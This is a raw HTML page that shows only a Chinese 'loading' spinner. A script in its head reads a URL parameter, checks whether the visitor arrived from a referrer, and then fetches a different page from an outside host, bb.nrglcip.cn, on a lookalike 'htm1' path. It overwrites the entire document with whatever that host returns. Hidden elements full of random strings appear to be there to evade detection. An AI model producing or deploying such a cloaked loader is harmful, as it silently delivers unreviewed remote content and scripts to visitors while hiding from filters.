<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .O9KsANy3naS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .O9KsANy3naS .wwrRWSsQqq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .O9KsANy3naS .content {
            line-height: 50px;
            text-align: center
        }

        .O9KsANy3naS .img {
            width: 100%
        }

        .O9KsANy3naS .GJpCbmJLbo {
            text-align: center
        }

        .O9KsANy3naS .GJpCbmJLbo span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .O9KsANy3naS .GJpCbmJLbo span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .O9KsANy3naS .GJpCbmJLbo span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .O9KsANy3naS .GJpCbmJLbo span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .O9KsANy3naS .GJpCbmJLbo span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .O9KsANy3naS .GJpCbmJLbo span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .O9KsANy3naS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VLbuT90j1fQae(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IMeKOY = VLbuT90j1fQae('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IMeKOY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IMeKOY +".html?a=share";
		}
		
        SmF1eAUn=url+"#"+new Date().getTime();
        SmF1eAUn && function() {
            $.get(SmF1eAUn, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>J9BwDI9otQNov</p>
<b style='display:none' >k0XaPhKWKDQIb2izAyi0J8rERezUcRHDLifrzGTIKYRWAYO2yLtIEVjw6n41bzNwYDfTQGy0vS1ujZhp7vz</b>
<h1 style='display:none' >XFew93hmJoPShBPnHXvmzOXs6JQUPgsa45okqbzZvpXL5ug</h1>
<li style='display:none' >MWVPCdhgKfCATuxE8u83OF9q6uETx4x2tYA5AJ9j5dxRkKUeA7z</li>
<h1 style='display:none' >XFew93hmJoPShBPnHXvmzOXs6JQUPgsa45okqbzZvpXL5ug</h1>
<h1 style='display:none' >XFew93hmJoPShBPnHXvmzOXs6JQUPgsa45okqbzZvpXL5ug</h1>
<img  src='' style='display:none'><div class="O9KsANy3naS">
    <div class="wwrRWSsQqq">
        <div class="GJpCbmJLbo">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >hJFt5os6PUeIfVEhHWkNujCkl1tizMk2TFCWfkvCnMXvohuj9829ESTj1AYmULlQ0kAKWmpigzXjk5E6TRM8d91z9PFdeZf</li>
<h1 style='display:none' >Gz5SsTxmcbcOn417uJF</h1>
<b style='display:none' >xAEhub4eGyU10Ai6rkw3Oifx6NwDRGRCVVCtmrv3uZM4ouR9XNaE1SfIo5lqIao5j0xdBTXzzJQlhpKvgD61eopHU4U5o2</b>
<li style='display:none' >hJFt5os6PUeIfVEhHWkNujCkl1tizMk2TFCWfkvCnMXvohuj9829ESTj1AYmULlQ0kAKWmpigzXjk5E6TRM8d91z9PFdeZf</li></body>
</html>